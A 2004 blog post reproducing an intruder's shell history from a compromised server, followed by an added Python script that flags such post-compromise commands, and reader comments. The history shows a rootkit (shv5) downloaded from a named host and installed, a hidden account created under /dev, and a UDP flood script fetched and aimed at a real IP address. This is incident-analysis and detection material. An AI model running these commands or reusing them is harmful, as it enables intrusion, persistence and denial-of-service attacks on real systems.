Monday, November 29, 2004

 

Cracker footsteps

Kevin dug up the history file for the cracker. Unix people will recognize this as an exact copy of what the guy did when he first logged in. It's like watching a videotape of somebody breaking into your house.


cd /dev
history
wget http://www.cascorosso.com/xpl/shv5.tar.gz
tar -zxvf shv5.tar.gz
cd shv5
./setup 123qwe 404
history -r~
history -r
vi /etc/passwd
vi /etc/passwd
/usr/sbin/userdel fire
/usr/sbin/userdel lordx
ps xw
w
ls
exit
uname -a
/usr/sbin/adduser crond -d /dev/crond
passwd crond
uname -a
exit
id
wget perl udp.pl 200.103.191.2 29 2000
wget www.packetstormsecurity.org/DoS/udp.pl
perl udp.pl 200.103.191.2 29 2000
which lsof
/usr/sbin/lsof | grep r0nin
/usr/sbin/lsof | grep r0nin | less
cd /home/httpd
ls
cd vhosts/
ls
pwd
less kaotic.pl
ls -la
which talkd
which tall
which talk
man talk
ls -lrt
less messages


Notice that kaotic.pl file -- it must have been there before this login, so the cracker must have deposited it somehow. By the time we got to kaotic.pl it was full of the same garbage that all the files had in them.
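Reading a history like this by eye works once; the same patterns (download, unpack, run an installer, tamper with history, add an account homed under /dev, fetch a flood script) can be flagged automatically. The script below is an added example, not code from the post or from Kevin; its rule labels are hypothetical names and the sample history is constructed, adapted from the post's listing with the download hosts and the DoS target replaced by documentation placeholders.

```python
# Added example, not from the post: flag post-compromise indicators in a captured shell
# history. Rule labels and the sample are constructed (sample adapted from the post, with hosts and target replaced).
import re

RULES = [  # (label, pattern); labels are hypothetical names
    ("fetch-remote-file",   re.compile(r"^\s*(wget|curl|ftp|tftp|scp)\b")),
    ("unpack-archive",      re.compile(r"^\s*tar\s+-?\w*x")),
    ("run-local-installer", re.compile(r"^\s*\./\w*(setup|install)\b")),
    ("history-tampering",   re.compile(r"^\s*(history\s+-[rcw]|unset\s+HISTFILE)")),
    ("direct-passwd-edit",  re.compile(r"^\s*(vi|vim|nano)\s+/etc/(passwd|shadow)\b")),
    ("account-change",      re.compile(r"^\s*(\S*/)?(useradd|adduser|userdel|passwd)\b")),
    ("home-under-dev",      re.compile(r"\s-d\s+/dev/")),  # home directory hidden in /dev
    ("work-in-dev",         re.compile(r"^\s*cd\s+/dev\b")),
    ("flood-tool",          re.compile(r"\budp\.pl\b")),
]

def triage_history(text):
    """Return (1-based line, label, command) triples; a command may match several rules."""
    return [(n, label, cmd.strip())
            for n, cmd in enumerate(text.splitlines(), start=1)
            for label, pat in RULES if pat.search(cmd)]

def install_chains(findings, window=5):
    """Correlate fetch -> unpack -> run-local-installer within `window` lines (drop-and-run)."""
    steps = ("fetch-remote-file", "unpack-archive", "run-local-installer")
    chains, start, need = [], None, 0
    for line, label, _ in findings:
        if start is not None and line - start > window:
            start, need = None, 0            # window expired, abandon partial chain
        if label == steps[0]:
            start, need = line, 1            # (re)start a chain at this download
        elif start is not None and label == steps[need]:
            need += 1
            if need == len(steps):
                chains.append((start, line))
                start, need = None, 0
    return chains

SAMPLE_HISTORY = """\
cd /dev
wget http://example.invalid/xpl/shv5.tar.gz
tar -zxvf shv5.tar.gz
./setup 123qwe 404
history -r
vi /etc/passwd
/usr/sbin/adduser crond -d /dev/crond
wget http://example.invalid/DoS/udp.pl
perl udp.pl 192.0.2.1 29 2000
ls
"""
```

Running `triage_history(SAMPLE_HISTORY)` flags every line except the benign `ls`, and `install_chains` on those findings reports one download-unpack-install chain spanning lines 2 to 4.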

Comments:
That's pretty nasty, using a security organization's own distribution of a denial of service tool (carefully labeled "for testing only") to commit a DoS attack.

Hmm -- I'm trying to think about whether software like that could be distributed with a license mechanism in place so it would require users to leave a trail? Of course if there were a source distribution it would mean someone could remove the license code. That would slow down the cookbook kids but only until a grownup released an unauthorized distribution with the crippleware disabled. Which I'm sure is why the good guys haven't bothered to do it. That plus the fact that some good guys wouldn't want to advertise their security testing, either. Oh, well.
 
:)

It might be constructive to go after those individual sources, but then again that's a whole nother obsession.

Pretty interesting to see the guy's footsteps, anyway.